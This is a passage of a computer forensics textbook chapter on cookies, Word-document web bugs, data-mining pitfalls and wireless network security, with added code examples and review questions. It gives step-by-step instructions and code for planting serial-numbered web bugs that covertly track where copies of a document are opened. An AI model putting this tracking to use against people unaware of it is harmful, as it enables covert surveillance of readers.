THE IMPLICATIONS OF COOKIES AND INTEGRATED PLATFORMS
Cookies have benefits and drawbacks
...
Used carelessly, they can poison a user’s impression of a
site and even prompt some users to stay away forever
...
Often, designers find themselves ill-equipped to
make this decision and so they employ cookies haphazardly or without regard for
user acceptance or data privacy
...
Instead, it explores technical considerations, interface design challenges, and (perhaps most importantly) ethical issues
...
The server asks the visitor’s browser program to “accept” the cookie—to save the ID number on the visitor’s computer
...
The ID number tells the server that the visitor has visited the site in the past
...
The ID number can save a visitor from having to repeatedly
log-in to a members-only site on each visit
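What the exchange above looks like on the server side, as an added example (not code from the book; the `sid` cookie name and the in-memory visit table are assumptions): the server issues an opaque random ID that encodes nothing about the visitor, keeps whatever it knows in its own store, and marks the cookie HttpOnly, Secure and SameSite so that page scripts, plain-HTTP requests and cross-site requests cannot read or replay it. On a later request it recognises the returning visitor by parsing the browser's Cookie header, and an ID it never issued is treated as a new visitor rather than trusted.

```python
import secrets
from http.cookies import SimpleCookie

COOKIE_NAME = "sid"     # assumed cookie name
_visits = {}            # server-side store (in-memory stand-in): opaque id -> visit count

def issue_cookie():
    """First visit: create an opaque random ID and the Set-Cookie header value for it."""
    sid = secrets.token_urlsafe(32)   # 256 bits of randomness; nothing about the visitor encoded
    _visits[sid] = 1
    jar = SimpleCookie()
    jar[COOKIE_NAME] = sid
    jar[COOKIE_NAME]["httponly"] = True    # page scripts cannot read it
    jar[COOKIE_NAME]["secure"] = True      # never sent over plain HTTP
    jar[COOKIE_NAME]["samesite"] = "Lax"   # not attached to cross-site requests
    jar[COOKIE_NAME]["path"] = "/"
    return sid, jar.output(header="").strip()

def recognise(cookie_header):
    """Later visit: parse the browser's Cookie header; return the visit count, or None if unknown."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    morsel = jar.get(COOKIE_NAME)
    if morsel is None or morsel.value not in _visits:
        return None                        # missing, expired or forged ID: a new visitor
    _visits[morsel.value] += 1
    return _visits[morsel.value]

if __name__ == "__main__":
    sid, header = issue_cookie()
    print("Set-Cookie:", header)
    print("visits:", recognise("sid=" + sid))   # 2
```

Everything the site learns about the visitor lives in `_visits` (a real deployment would use a database with an expiry), so the cookie itself reveals nothing if it is copied or logged, and a user who clears it simply becomes a first-time visitor again.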
...
Many users fear,
sometimes justifiably, that a cookie they accept may allow unscrupulous Web site
operators to gather information about them and then use that data in an unauthorized manner
...
Web site integrated platform designers should note this sometimes justified mistrust in cookies and design accordingly
...
Both Netscape and Microsoft
browsers can consult users before accepting a cookie, and many users choose to
browse with this preference turned on
...
Often, even
visitors who accept a cookie are still bombarded by offers of more cookies from the
same site
...
As feedback from users reaches
566
Computer Forensics, Second Edition
the designers of browser software, look for browsers to add the following features
to help users cope with this overuse of cookies:
Reject all cookies option
Better choices when asked
Cookie management tools
Reject All Cookies Option
Today, browsers present only the annoying false choice between “Accept all cookies without asking” and “Ask about each cookie”
...
Better Choices When Asked
For users who choose notification, browsers should offer a more flexible set of
choices regarding what happens after a cookie has been accepted or rejected
...
About this particular cookie on this Web site integrated platform
About any cookie on this Web site integrated platform
About any cookie on this page
Cookie Management Tools
Finally, expect to see browsers offer a mechanism that lets users view and manage
the set of cookies they’ve collected
...
Until a majority of common browsers have incorporated
these options, integrated platform designers should plan to minimize the number
and type of cookies a visitor encounters on a site
...
A Web bug could allow an author to track where a document is being read and how often
...
Some possible uses of Web bugs in Word documents include
Detecting and tracking leaks of confidential documents from a company
Tracking possible copyright infringement of newsletters and reports
Monitoring the distribution of a press release
Tracking the quoting of text when it is copied from one Word document to a
new document
Web bugs are made possible by the ability in Microsoft Word of a document to
link to an image file that is located on a remote Web server
...
This image-linking feature puts a remote server in the position to monitor
when and where a document file is being opened
...
A host name will typically include a company name if a computer is located at a business
...
An additional issue, and one that could magnify the potential surveillance, is
that Web bugs in Word documents can also read and write browser cookies belonging to Internet Explorer
...
Web bugs are used extensively for tracking by Internet advertising companies
on Web pages and in HTML-based email messages
...
Although the Privacy Foundation has found no evidence that Web bugs are
being used in Word documents today, there is little to prevent their use
...
However, the Privacy Foundation has recommended to Microsoft that cookies be disabled in Microsoft Word
through a software patch
...
Detailed Description
Microsoft Word has, from the beginning, supported the ability to include picture
files in Word documents
...
doc file
...
All that is required to use this feature is to know the URL (Web address) of the image
...
Linking to the
image results in smaller Word document files because only a URL needs to be
stored in the file instead of the entire image
...
This is necessary to display the image on the screen or to print it out as part
of the document
...
Furthermore, it is possible to include an image in a Word document solely
for the purpose of tracking
...
Web bugs today are
already used extensively by Internet marketing companies on Web pages and embedded in HTML email messages
...
Because the author of the document has control of the URL of the document,
they can put whatever information they choose in this URL
...
These tracking abilities might be used in any number of ways
...
One example of this tracking ability is to monitor the path of a confidential
document, either within or beyond a company’s computer network
...
If the
company’s Web server ever received a “server hit” from an IP address for the bug
outside the organization, then it could learn immediately about the leak
...
All original copies of a confidential document could also be numbered so that
a company could track the source of a leak
...
If the document is leaked, the server
hit for the Web bug will indicate which copy was leaked
...
The utility program would scan a document for the Web bug URL and
add a serial number in the query string
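The serial-numbering utility and the leak check described above, as an added example (not the Privacy Foundation's or Microsoft's code): it rewrites the beacon URL with a per-recipient `id` query parameter, then scans Common Log Format lines from the web server for beacon hits whose source address lies outside the organisation's ranges. The beacon URL, the internal address ranges, the document text and the log lines are all constructed for the example. Two caveats a practitioner should keep in mind: the source address identifies a network egress, not a person (proxies, VPNs and mail gateways that prefetch links all produce hits), and a recipient who strips the linked image defeats the scheme entirely.

```python
import ipaddress
import re
from urllib.parse import urlsplit, urlunsplit, parse_qs, urlencode

# hypothetical beacon: a tiny image linked from the document rather than embedded in it
BUG_URL = "http://docs.example.com/img/spacer.gif"
# constructed: address ranges that count as "inside" the organisation
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("203.0.113.0/24")]

def serialise_bug(url, serial):
    """Return the beacon URL with a per-copy serial number in the query string."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    query["id"] = [str(serial)]
    return urlunsplit(parts._replace(query=urlencode(query, doseq=True)))

def stamp_copies(document_text, recipients):
    """The 'utility program' of the text: one numbered copy of the document per recipient."""
    return {name: document_text.replace(BUG_URL, serialise_bug(BUG_URL, n))
            for n, name in enumerate(recipients, start=1)}

# Common Log Format: client ident authuser [date] "request" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET (?P<target>\S+) HTTP/[\d.]+" \d{3}')

def find_leaks(log_lines, serial_to_recipient):
    """Beacon hits from outside the organisation, attributed to the numbered copy that was opened."""
    bug_path = urlsplit(BUG_URL).path
    leaks = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if target.path != bug_path:
            continue                         # an ordinary page hit, not the beacon
        ids = parse_qs(target.query).get("id")
        if not ids or not ids[0].isdigit():
            continue                         # unserialised copy: the hit cannot be attributed
        try:
            ip = ipaddress.ip_address(m.group("ip"))
        except ValueError:
            continue                         # hostname logged instead of an address
        if any(ip in net for net in INTERNAL_NETS):
            continue                         # opened inside the organisation
        leaks.append((serial_to_recipient.get(int(ids[0]), "unknown"), str(ip), m.group("ts")))
    return leaks

# constructed input: a document body containing the linked image, and three log lines
DOCUMENT = "CONFIDENTIAL draft. Linked image: " + BUG_URL
RECIPIENTS = ["alice", "bob"]
SAMPLE_LOG = [
    '10.1.2.3 - - [12/Mar/2004:09:15:02 +0000] "GET /img/spacer.gif?id=2 HTTP/1.1" 200 43',
    '198.51.100.7 - - [12/Mar/2004:11:40:11 +0000] "GET /img/spacer.gif?id=2 HTTP/1.1" 200 43',
    '198.51.100.9 - - [12/Mar/2004:12:01:55 +0000] "GET /index.html HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    serials = {n: name for n, name in enumerate(RECIPIENTS, start=1)}
    print(find_leaks(SAMPLE_LOG, serials))   # [('bob', '198.51.100.7', '12/Mar/2004:11:40:11 +0000')]
```

The first log line is the same copy opened on the internal network and is ignored; the second is the same copy fetched from an outside address, which is the leak signal the text describes; the third is an outside hit on an ordinary page and is not a beacon at all.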
...
Another use of Web bugs in Word documents is to detect copyright infringement
...
The Web bugs in a newsletter could contain unique customer ID numbers to detect how widely an individual newsletter is copied and distributed
...
For example,
a company could place Web bugs in a press release distributed as a Word document
...
The company could also observe
how a press release is passed along within an organization or to other organizations
...
A document could be bugged before it is distributed
...
If text were to be cut and pasted from the
document, it is likely that a Web bug would be picked up also and copied into the
new document
To place a Web bug in a Word document is relatively simple
...
2
...
Select the Insert | Picture | From File menu command
...
Select the Link to File option of the Insert button
...
Any file
format that supports automatic linking to Web pages or images could lead to the
same problem
...
This issue is potentially critical for music file formats such as MP3 files where
piracy concerns are high
...
The embedded HTML with embedded Web bugs could also be
used to track how many times a song is played and by which computer, identified
by its IP address
...
The number of data-mining consultants, as well as the number of commercial tools available to the “nonexpert” user,
are also quickly increasing
...
As more and more nonexperts seek to exploit this
technology to help with their business, it becomes increasingly important that they
understand the underlying assumptions and biases of these tools
...
In particular, there are important issues regarding the data that should be examined before
proceeding with the data-mining process
...
Now let’s focus on three specific issues
...
Also, insight is provided for each issue on how it might be problematic, and suggestions are made on which techniques can be used for approaching such situations
...
Particular concern is also established here
with characteristics of the data that may affect the overall usefulness of the IW
data-mining results
...
These lessons, together with the accompanying discussion, will help
to both guide the IW data-collection process and better understand what kinds of
results to expect
...
There are a number of
factors to consider before applying data mining to any particular database
...
Many of these issues are well known by both the data
mining experts and a growing body of nonexpert, data owners
...
There should not be a large number of missing or incomplete
records or fields
...
This section will discuss three specific, but less well-known, issues
...
The first is the impact of data distribution
...
Sometimes, however, obtaining samples of all classes is surprisingly difficult
...
High-quality data, combined with
good data-mining tools, does not ensure that the results can be applied to the desired goal
...
The current technology cannot fully
exploit arbitrary text, but there are certain ways text can be used
...
Indeed, for many IW data-mining experts, these are important issues that are often well understood
...
It is
tempting to collect a large amount of clean data, massage the representation into the
proper format, hand the data tape to the consultant, and expect answers to the most
pressing business questions
...
Two Examples
The discussion of data distribution, information relevance, and use of text will be
illustrated with examples from two current projects
...
In this project, one of the primary goals is to help
identify and characterize precursors to potentially dangerous situations in the aviation world
...
For any type of flight—commercial, cargo, military, or pleasure—accidents
(and often less serious incidents) are investigated
...
These reports often include the inspector’s written summary
...
A source of such reports is the National
Transportation Safety Board (NTSB)
...
In this particular instance, vehicles (mostly passenger vehicles and
small trucks) arrive at an inspection stop
...
There is typically a constant flow of cars to be processed, so excessive time cannot be taken
...
If the primary inspector feels it is
warranted (and there are any number of reasons that justify this), any vehicle can
be pulled out for secondary inspection
...
If the driver or vehicle is found to be in violation of the
particular laws under consideration, then information concerning both driver and
vehicle is collected and entered into the “violators” database
...
Data Distribution
Let’s first discuss the issue of data distribution
...
Consider the aviation safety
domain
...
An obvious source of information is the NTSB’s database of
accident reports
...
That is, the data are unevenly distributed between
records of accident flights and records of uneventful flights
...
When given the data containing only
accident flights, each of the approaches in this class concludes that all flights contain accidents
...
The majority of the flights are
uneventful
...
Furthermore, some of the most popular IW data-mining tools, including decision tree
inducers, neural networks, and nearest neighbor algorithms, fall into this class of
techniques
...
To continue this discussion, it is necessary to first define some terms used in
data mining
...
In the aviation domain, the target concept is accident flights
...
The NTSB data do not contain records of uneventful flights
...
The problem of learning to differentiate members from nonmembers is called a “supervised concept learning
problem”
...
For example, a supervised concept learner uses a training sample as input
...
The supervised concept learner
produces hypotheses that discriminate the members and nonmembers in the sample
...
Let’s say that a supervised concept learner makes the closed-world assumption
that the absence of nonmembers in the data implies that they do not exist in the
universe
...
These learners partition the training sample into pure subsamples, containing either all member or all
nonmembers
...
That is, the learners introduce conditions that define partitions of the training sample; each outcome of a condition represents a different subsample
...
Unfortunately, if the input
sample contains only data that are members of the target class, the training sample
is already pure and the decision tree learner has no need to break up the sample further
...
Thus, in the aviation project, all flights
would be classified as accident flights, because the learner never saw any uneventful flights
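The failure described above, made concrete as an added example (not from the book): a one-level decision tree (a stump) chooses the split that most reduces entropy, and when the training sample is already pure it has nothing to reduce and returns a single leaf. Trained on constructed accident-only records it labels every flight an accident, however benign; once constructed uneventful records are added it finds a discriminating split. The attributes, values and the resulting rule are contrived.

```python
import math
from collections import Counter

def entropy(labels):
    n = len(labels)
    return -sum(c / n * math.log2(c / n) for c in Counter(labels).values())

def candidate_splits(records, attr):
    """Thresholds between neighbouring numeric values, or equality tests for categories."""
    values = sorted({r[attr] for r in records})
    if all(isinstance(v, (int, float)) for v in values):
        return [("<=", (a + b) / 2) for a, b in zip(values, values[1:])]
    return [("==", v) for v in values]

def matches(record, attr, op, value):
    return record[attr] <= value if op == "<=" else record[attr] == value

def majority(labels):
    return Counter(labels).most_common(1)[0][0]

def learn_stump(records, attrs, label="label"):
    """One-level decision tree: pick the split with the lowest conditional entropy."""
    labels = [r[label] for r in records]
    if entropy(labels) == 0.0:
        # Pure sample.  Under the closed-world assumption there is nothing to
        # separate, so the learner stops here with a single leaf.
        return {"leaf": majority(labels)}
    best = None
    n = len(records)
    for attr in attrs:
        for op, value in candidate_splits(records, attr):
            yes = [r for r in records if matches(r, attr, op, value)]
            no = [r for r in records if not matches(r, attr, op, value)]
            if not yes or not no:
                continue
            cond = (len(yes) / n) * entropy([r[label] for r in yes]) \
                 + (len(no) / n) * entropy([r[label] for r in no])
            if best is None or cond < best[0]:
                best = (cond, attr, op, value,
                        majority([r[label] for r in yes]), majority([r[label] for r in no]))
    _, attr, op, value, yes_label, no_label = best
    return {"attr": attr, "op": op, "value": value, "yes": yes_label, "no": no_label}

def predict(stump, record):
    if "leaf" in stump:
        return stump["leaf"]
    hit = matches(record, stump["attr"], stump["op"], stump["value"])
    return stump["yes"] if hit else stump["no"]

ATTRS = ["pilot_hours", "weather"]

# constructed records with contrived values: what an accident-only extract looks like
ACCIDENTS = [
    {"pilot_hours": 80, "weather": "IMC", "label": "accident"},
    {"pilot_hours": 150, "weather": "IMC", "label": "accident"},
    {"pilot_hours": 60, "weather": "VMC", "label": "accident"},
    {"pilot_hours": 200, "weather": "IMC", "label": "accident"},
]
# constructed records for the uneventful flights the NTSB data never contain
UNEVENTFUL = [
    {"pilot_hours": 1200, "weather": "VMC", "label": "uneventful"},
    {"pilot_hours": 900, "weather": "VMC", "label": "uneventful"},
    {"pilot_hours": 3000, "weather": "IMC", "label": "uneventful"},
    {"pilot_hours": 450, "weather": "VMC", "label": "uneventful"},
]

if __name__ == "__main__":
    print(learn_stump(ACCIDENTS, ATTRS))               # {'leaf': 'accident'}
    print(learn_stump(ACCIDENTS + UNEVENTFUL, ATTRS))  # a split on pilot_hours <= 325.0
```

The same collapse happens with any learner in the class the text names; the stump is just the smallest one in which the pure-sample shortcut is visible as a single line of code.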
...
For many problems, when representative data from all the concepts involved is available, these learners are both effective and efficient
...
Even when the IW data-mining algorithms can be successfully run, there still may be
a problem of relevance
...
For instance, if the data mining produces typical “if ... then” rules,
then it must be possible to measure the values of the attributes in the condition
(“if” part) of those rules
...
Consider a simple example where the goal is to
predict if a dog is likely to bite
...
Assume further that the data-mining tools work splendidly, and it is discovered that the following (admittedly contrived) rules apply: Rule 1: If the rear
molars of the dog are worn, the dog is unlikely to bite
...
These may seem like excellent rules
...
There are two reasons for this: First, there is a time constraint in applying the
rules
...
Second, even without such a constraint, the average person probably can’t make judgments about
molar wear and muscle development
...
In the vehicle-targeting task described earlier, a similar situation occurred
...
As mentioned, much more information is collected concerning actual violators
than for those who are just passed through the checkpoint
...
The problem, noticed before any analysis was done, was that the information that would make up the profiles would not be applicable to the desired task
...
During
that time, they have access to only superficial information
...
Thus, they have no way to apply classification rules
that measure features such as “number of other cars owned,” “bad credit history,”
or “known to associate with felons” (types of data collected on violation vehicles
and drivers)
...
The problem is that the data cannot be applied to the initially
specified task
...
Often, IW data mining begins with data that has been
previously collected, usually for some other purpose
...
As the examples show, this is often not the
case
...
No one ever
intended to use this information as a screening tool at stop points
...
Does it address the current situation directly? Similarly, when data is collected for the specific
task at hand, careful thought must go into collecting the relevant data
...
The
most obvious is to use additional data from another source
...
For instance, returning to
the example of the dogs, general aggressiveness characteristics for different breeds
of dogs have been determined
...
When the necessary data does not already
exist, it may be necessary to collect it
...
In this case, data must be collected that relates
directly to the information available to the inspectors at the initial inspection
...
Of course, collecting new data may be a very expensive process
...
This often involves discussions and interviews with
experts in the field
...
It
may be that an inordinate amount of manpower is required, or that certain features
are difficult to measure
...
It may be possible to alter the initial goals or questions
...
A good example
would be looking at simple statistical patterns for time of day, weather, season, and
holidays
...
Another alternative is to use the violator database to profile suspects for other situations
...
Perhaps this information can be
used elsewhere in law enforcement
...
However, it may not be possible to achieve that goal with this data and the
given time constraints
...
Combining Text and Structured Data
IW data mining is most often performed on data that is highly structured
...
An example of structured data is a database containing records describing aircraft accidents that includes fields such as the make of an airplane and
the number of hours flown by the pilot
...
Although more difficult to immediately use
than structured data, data mining should make use of these available text resources
...
These techniques require structured fields with clearly
defined sets of possible values that can be quickly counted and matched
...
Text is not so well behaved
...
These are difficult issues
that are not yet totally solved, but useful progress has been made and techniques
have been developed so that text can be considered a resource for data mining
...
Information retrieval is concerned with methods for efficiently retrieving documents relevant to a given request or query
...
More specifically, this
method first identifies all the unique words in the document collection
...
Using the simplest weighting method, this vector has
a value of 1 at position x when the xth vocabulary word is present in the document; otherwise it has a value of 0
...
Now each document vector
can be compared to every other document by comparing their word vectors
...
Surprisingly, although this approach discards the structure
in the text and ignores the problems of polysemy and synonymy altogether, it has
been found to be a simple, fast baseline for identifying relevant documents
...
The
narrative description of each accident was represented as a vector and compared to
all other narratives using the approach described earlier
...
The following accident reports were found to be similar in this
respect:
MIA01LA055: During takeoff roll he or she applied normal right rudder to
compensate for engine torque
...
ANC00LA099: Veered to the left during the first attempt to take off
...
Identifying this kind of a group would be difficult using fixed fields alone
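The binary word-vector comparison described above, as an added example (not the authors' code): every narrative becomes a 0/1 vector over the collection's vocabulary, and narratives are ranked by the cosine of the angle between vectors. The two report identifiers are the ones quoted above, but their narratives have been extended and a third, unrelated narrative added, all constructed for the example; the short stop-word list is an assumption. Polysemy and synonymy are ignored, exactly as the text says, and the two take-off veer reports still come out as nearest neighbours.

```python
import math
import re

# assumed stop-word list; real systems use a much longer one
STOPWORDS = {"the", "a", "an", "to", "of", "and", "or", "he", "she", "his", "her",
             "during", "for", "in", "on", "at", "with", "was", "were", "it", "but",
             "first", "off", "be", "had"}

def tokens(text):
    return {w for w in re.findall(r"[a-z]+", text.lower()) if w not in STOPWORDS}

def vocabulary(docs):
    """All unique words across the collection, in a fixed order."""
    return sorted(set().union(*(tokens(t) for t in docs.values())))

def binary_vector(text, vocab):
    """Simplest weighting: 1 at position x if vocabulary word x occurs, else 0."""
    present = tokens(text)
    return [1 if w in present else 0 for w in vocab]

def cosine(u, v):
    dot = sum(a * b for a, b in zip(u, v))
    norm = math.sqrt(sum(u)) * math.sqrt(sum(v))   # for 0/1 vectors |u|^2 is the number of ones
    return dot / norm if norm else 0.0

def rank_similar(docs, query_id):
    """Every other narrative scored against the query narrative, best first."""
    vocab = vocabulary(docs)
    vectors = {doc_id: binary_vector(text, vocab) for doc_id, text in docs.items()}
    scores = [(cosine(vectors[query_id], vec), doc_id)
              for doc_id, vec in vectors.items() if doc_id != query_id]
    return sorted(scores, reverse=True)

# constructed narratives: the first two extend the fragments quoted above,
# the third is an unrelated report added for contrast
NARRATIVES = {
    "MIA01LA055": "During takeoff roll he applied normal right rudder to compensate "
                  "for engine torque. The airplane veered left and departed the runway.",
    "ANC00LA099": "Veered to the left during the first attempt to take off. The pilot "
                  "applied right rudder but the airplane left the runway surface.",
    "EXAMPLE-3":  "The engine lost power in cruise flight. The pilot made a forced "
                  "landing in a field and the airplane nosed over.",
}

if __name__ == "__main__":
    for score, doc_id in rank_similar(NARRATIVES, "MIA01LA055"):
        print(f"{doc_id}: {score:.2f}")   # ANC00LA099 first, EXAMPLE-3 last
```

Shared words such as "veered", "rudder" and "runway" carry the match; "left" counts as shared even though it means a direction in one narrative and "departed" in the other, which is the polysemy the method tolerates.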
...
This can be a useful tool for
identifying patterns in the flight history of the accident so that the events leading up
to different accidents can be more clearly identified
...
A collection of documents and a taxonomy of terms are combined so that maximal word
or category associations can be calculated
...
Another approach relevant to IW data mining from text is information extraction (IE)
...
The
biggest problem with IE systems is that they are time-consuming to build and domain specific
...
IE tools could be used in the airline safety data to pull out information
that is often more complete in the text than in the fixed fields
...
An example of just such an overlap can be found in the NTSB accident and incident records
...
However, it was found that these fields are
rarely filled out completely enough to make a classification: 95% of the records that
were identified as involving people could only be classified as “unknown”
...
Such an
approach could make use of a dictionary of synonyms for “mistake” and a parser
for confirming if the mistake was an action made by the pilot or copilot and not in
a sentence describing, for example, the maintenance methods
...
Although automatic systems that completely understand the text are still a long way off, one of
the surprising recent results is that simple techniques, which sometimes completely
ignore or only partially address the problems of polysemy, synonymy, and complex
structure of text, still provide a useful first cut for mining information from text
...
THE INTERNET IS BIG BROTHER
How prepared is your business for the future? As the Internet expands its reach to
the farthest corners of the globe, companies will find themselves dealing with increasingly complex challenges such as Big Brother
...
First, the
experience will not be anything like what we’re familiar with
...
Third, the business environment of the future
will be much less forgiving, so companies that do not take the new technologies seriously are putting themselves at risk
...
Recently, better installation techniques and a wider range of fiber-compatible equipment have made fiber both
easily available and less expensive than it used to be
...
After all, few businesses want to bear even slightly higher
costs for fiber installation and networking gear
...
Expect them to get away with it,
too, because for most practical purposes, copper can handle the load
...
The biggest problem the providers face seems to be
keeping up with demand
...
Even then, North America will be home to
wide swaths of rural territory without high-speed access
...
Unless governments (Big Brother) insist that Internet carriers supply rural service at a loss (as
American telephone companies were ordered to do with voice service), broadband
providers will have little incentive to deploy their technologies on a wide scale
...
In its infant state, broadband wireless, with its ability to support certain
e-business applications, is best suited to a LAN-like role
...
A Truly Global Internet
The days of Americans (Big Brother) ruling the Internet are not over by a long shot
...
As the Internet becomes more pervasive, businesses will face an
even greater shortage of skilled employees
...
As always, the spoils will go to those businesses that think ahead
...
That means considering technical
issues and different standards of civil rights, conduct, and privacy
...
THE WIRELESS INTERNET: FRIEND OR FOE?
The wireless networking engineer was working her way through the IW test range
when she stopped and looked at her computer screen
...
She was testing the roaming capabilities of 802.11
...
This isn’t surprising, because one of the nice things about wireless Internet is
the ability to install the products quickly and easily, with a minimum amount of
configuration
...
If Internetwork managers don’t pay attention to the fact that the default condition of wireless access points is to let anyone into the network, then they may be
doing just that
...
It’s like installing a network port on the lamppost
outside your building and asking anyone who walks by to plug in
...
It just requires network administrators to take a few simple steps
...
Having that ID makes logging-in even easier than it already
is
...
All 802
...
Third,
turn on your ability to use access control lists, available in some access points
...
These steps will keep most wireless networks reasonably secure
...
You must also deal with the fact that wireless access points are inexpensive and
that getting them running is a no-brainer
...
You’d then have an entry point into your network that’s
open to anyone with a wireless Internet card
...
Another problem is that, without limits on what users are allowed to do and
where they’re allowed to go, you lose control
...
One
solution is to move to a third-party provider of wireless security products, such as
WRQ, whose NetMotion product requires a login that’s authenticated through
Windows NT
...
Such capabilities require a bit more attention from managers, but the result can be
a wireless Internet that’s more secure than the wired one it’s attached to
...
Meanwhile, these employees opened their companies’ networks to anyone (friend,
foe, hacker, or spy) who cared to enter
...
That eliminates the need for employees to buy their
own access points, and it gives the IT department the tools it needs to detect and
eliminate them
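The configuration steps above (an access point identifier that is not left at its factory value and advertised to everyone in range, link-layer encryption switched on, and client access control lists enabled) and the detection of employee-installed access points both reduce to the same task: comparing access-point state with what the IT department sanctioned. The Python script below is an added example, not code from the book or from any vendor; it audits a constructed list of access-point records against a constructed inventory of sanctioned radio MAC addresses (BSSIDs) and reports which of those steps each device fails. The record fields, the factory SSID list and the sample data are assumptions made for the illustration rather than any real product's export format, and the encryption check only verifies that encryption is not disabled, since the book's era relied on WEP and the particular cipher is not the point of the passage.

```python
"""Audit wireless access-point configurations against a sanctioned inventory.

Added example for the wireless-hardening discussion. The record format,
field names, factory SSID list and sample data below are constructed for
this illustration; they are not an export format of any real product.
"""
from dataclasses import dataclass

# Constructed list of identifiers that access points ship with; an SSID
# still set to one of these is a sign that the device was never configured.
FACTORY_SSIDS = {"default", "linksys", "wireless", "tsunami"}


@dataclass
class AccessPoint:
    bssid: str             # radio MAC address; the inventory is keyed on it
    ssid: str              # network identifier the device advertises or hides
    encryption: str        # "open" means link-layer encryption is disabled
    ssid_broadcast: bool   # True if the identifier is beaconed to passers-by
    mac_acl_enabled: bool  # True if only listed client MACs may associate


def audit_access_point(ap: AccessPoint, sanctioned_bssids: set[str]) -> list[str]:
    """Return the list of hardening steps this access point fails (empty = OK)."""
    findings = []
    if ap.bssid.lower() not in sanctioned_bssids:
        # An access point nobody in IT registered: the employee-bought case.
        findings.append("rogue: not in IT inventory")
    if ap.encryption.lower() == "open":
        findings.append("open: link-layer encryption disabled")
    if ap.ssid.lower() in FACTORY_SSIDS:
        findings.append("factory SSID: identifier never changed")
    if ap.ssid_broadcast:
        findings.append("SSID broadcast on: identifier advertised")
    if not ap.mac_acl_enabled:
        findings.append("ACL off: any client may associate")
    return findings


def audit_fleet(aps: list[AccessPoint], sanctioned_bssids: list[str]) -> dict[str, list[str]]:
    """Map each observed BSSID to its findings; MAC case is normalised first."""
    sanctioned = {b.lower() for b in sanctioned_bssids}
    return {ap.bssid: audit_access_point(ap, sanctioned) for ap in aps}


def rogue_bssids(aps: list[AccessPoint], sanctioned_bssids: list[str]) -> list[str]:
    """Just the BSSIDs the IT department did not install, for follow-up."""
    report = audit_fleet(aps, sanctioned_bssids)
    return [b for b, f in report.items() if "rogue: not in IT inventory" in f]


# Constructed inventory of access points the IT department installed.
SANCTIONED = ["00:11:22:33:44:01", "00:11:22:33:44:02"]

# Constructed observations, e.g. from a walk through the building with a scanner.
OBSERVED = [
    AccessPoint("00:11:22:33:44:01", "corp-net", "wpa2", False, True),
    AccessPoint("00:11:22:33:44:02", "corp-net", "wep", False, False),
    # The access point an employee plugged in on their own:
    AccessPoint("00:11:22:33:44:99", "linksys", "open", True, False),
]

if __name__ == "__main__":
    for bssid, findings in audit_fleet(OBSERVED, SANCTIONED).items():
        print(f"{bssid}: {'OK' if not findings else '; '.join(findings)}")
    print("rogue devices:", rogue_bssids(OBSERVED, SANCTIONED))
```

Run as a script it prints one line per access point; in practice the observed list would come from a periodic scan and the inventory from the IT department's records, so the rogue check is the part that catches the access points employees bring in on their own.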
...
The means
are relatively inexpensive, easy to smuggle, virtually untraceable, and completely
deniable
...
Currently, the security solutions lag far behind the potential threat
...
The basic concepts and principles that must be understood
and can help realistically guide the process of moving forward in dealing with the
surveillance tools for the IW of the future are as follows
...
With this emphasis, they must carefully assess the vulnerabilities of the systems they employ
...
This needs to be accomplished through a more balanced investment strategy by the U.S.
military that conquers our institutional prejudices
that favor killer systems weapons
...
The electromagnetic spectrum will be their Achilles’ heel if the U.S. military
does not pay sufficient attention to protecting their use of the spectrum and, at
the same time, recognize that they must take away the enemy’s ability to see the
U.S. forces and to control their own forces
...
Other nations have realized the value of offensive applications of the IW arsenal of the future; therefore, the U.S. military must attack the issue from two directions, offensively and defensively, with almost equal accentuation
...
When the Soviets developed a nuclear program after World War
II, the United States was caught by surprise
...
As with so many other design issues, taking the user’s experience into account
suggests how to proceed with implementing cookies
...
Although automated understanding of natural language is not available, an increasing number of techniques can be used for exploiting text data
...
An Agenda for Action
It must be pointed out that although such IW preparation measures can provide a
minimum level of protection against tampering, there is no such thing as 100% security
...
At present the cost of protection is higher than the cost
of attack, and until an attack on a major system actually happens, organizations are
unlikely to take security measures as seriously as they could or should
...
Action steps should include, but not be limited to, the 11 areas shown in Table F18
...
Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...
CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...
With this emphasis, they must carefully assess the vulnerabilities of the systems
they employ
...
True or False? Interdict opportunities exist for adversaries to intrude on U.S. military systems
...
True or False? Offensive systems will be at risk if the U.S. military does not
apply sufficient defensive considerations in this process
...
True or False? The IW arsenal of the future adds a fourth dimension of warfare
to those of air, land, and sea
...
In this new dimension, the U.S. military must stay ahead
...
True or False? An important feature of bandwidth/packet management technology is its stealthy wireless Internet security features that render complete
invisibility and protection for end users from network hackers and other wireless users sharing the same access points
...
As feedback from users reaches the designers of browser software, look for
browsers to add the following features to help users cope with this overuse of
cookies, except:
A
...
Better choices when asked
C
...
Cookie management tools
2
...
,” except:
A
...
About all cookies
C
...
About any cookie on this page
3
...
Managing documents
B
...
Tracking possible copyright infringement of newsletters and reports
D
...
Tracking the quoting of text when it is copied from one Word document
to a new document
4
...
The full URL of the Web bug image
B
...
A Web browser cookie (optional)
D
...
To place a Web bug in a Word document is relatively simple
...
Select the Delete | Picture | From File
...
B
...
menu command
...
Type in the URL of the Web bug in the File Name field of the Insert Picture
dialog box
...
Select the Link to File option of the Insert button
...
He deduced that his trusted staff of system administrators might have been misusing
their access privileges and the network servers for some unknown purpose
...
How was
the CFST able to go about conducting their investigation?
HANDS-ON PROJECTS
A large multinational corporation was accused of questionable financial reporting
by the SEC, resulting in an investigation by a major independent consulting company
...
How did the CFS go about conducting the investigation?
Case Project
A CFST conducted the analysis of multiple seized computer systems taken in connection with major cases of central excise duty evasion in the Indian government
...
Austin is the state capital, and the government offices employ approximately 20% of the population
...
The APD also had a system administrator who was located out of state, and they weren’t sure he was trustworthy
...
How did the CFS go about conducting the investigation?
REFERENCES
[1] Vacca, John R
...
[2] Vacca, John R
...
[3] Vacca, John R
...
[4] Vacca, John R
...
[5] Vacca, John R
...
[6] Vacca, John R
...
[7] Vacca, John R
...
, Prentice Hall, New York,
2001
...
National information systems are, among other things, already used to conduct commerce and regulate and control national production
...
